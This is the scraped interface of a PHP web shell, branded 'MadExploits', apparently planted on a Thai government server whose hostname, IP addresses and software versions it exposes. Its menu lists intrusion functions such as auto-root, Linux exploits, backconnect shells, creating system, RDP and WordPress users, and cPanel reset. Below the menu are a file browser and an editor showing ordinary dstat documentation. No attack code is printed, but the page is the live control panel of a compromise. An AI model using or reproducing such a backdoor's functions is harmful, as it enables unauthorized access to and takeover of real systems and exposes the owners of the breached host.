Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
dstat-0.7.0 /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxr-xr-x
AUTHORS
28
B
-rw-r--r--
COPYING
17.57
KB
-rw-r--r--
ChangeLog
16.32
KB
-rw-r--r--
README
1.52
KB
-rw-r--r--
TODO
3.9
KB
-rw-r--r--
counter-rollovers.html
14.24
KB
-rw-r--r--
counter-rollovers.txt
2.6
KB
-rw-r--r--
cplugins.html
11.53
KB
-rw-r--r--
cplugins.txt
305
B
-rw-r--r--
dstat-paper.html
53.72
KB
-rw-r--r--
dstat-paper.txt
31.3
KB
-rw-r--r--
dstat.1.html
28.46
KB
-rw-r--r--
dstat.1.txt
9.52
KB
-rw-r--r--
examples.html
11.85
KB
-rw-r--r--
examples.txt
547
B
-rw-r--r--
performance.txt
1.84
KB
-rw-r--r--
screen.html
13.09
KB
-rw-r--r--
screen.txt
1.44
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : performance.txt
Dstat performance ================= Introduction ------------ Since dstat is written in python, it is not optimized for performance. When doing performance analysis, it is always important to verify that the monitoring tool is not messing with the performance numbers. (eg. writing to disk, using cpu/memory/network, increasing load) Depending on the stats being used and the load on the server itself the impact Dstat has on the system you are monitoring might be considerable. A lot of plugins are pretty fast (less than 0.1ms on an modest 1.2Ghz laptop, but some plugins may use up to 3ms using up to 2% of your CPU). Before performing any tests please verify for yourself what impact Dstat has on your test results and keep that in mind when analysing the results afterwards. In case the impact is higher than expected, reduce the number of stats and remove expensive stats or even look at the plugin you're using and send me optimisations. Newer python versions are also faster than older ones, and hardware is only becoming faster at a pace that these considerations may not hold anylonger. If you need feedback about plugin performance, use the --debug option to profile different plugins. If you use -t together with --debug, you can see the time deviation on your system in relation to load/plugins. Remember that invisible plugins (that run out of your terminal window) do take up cycles because the information is still being collected and possibly written to CSV output. It should be possible to write plugins in C to improve the impact on the system, but I have no experience with writing python modules in C. Any feedback on this is welcomed. Performance tuning ------------------ The following documents may be useful to tune a system for performance * http://people.redhat.com/alikins/system_tuning.html[] NOTE: Please send me improvements to this document.
Close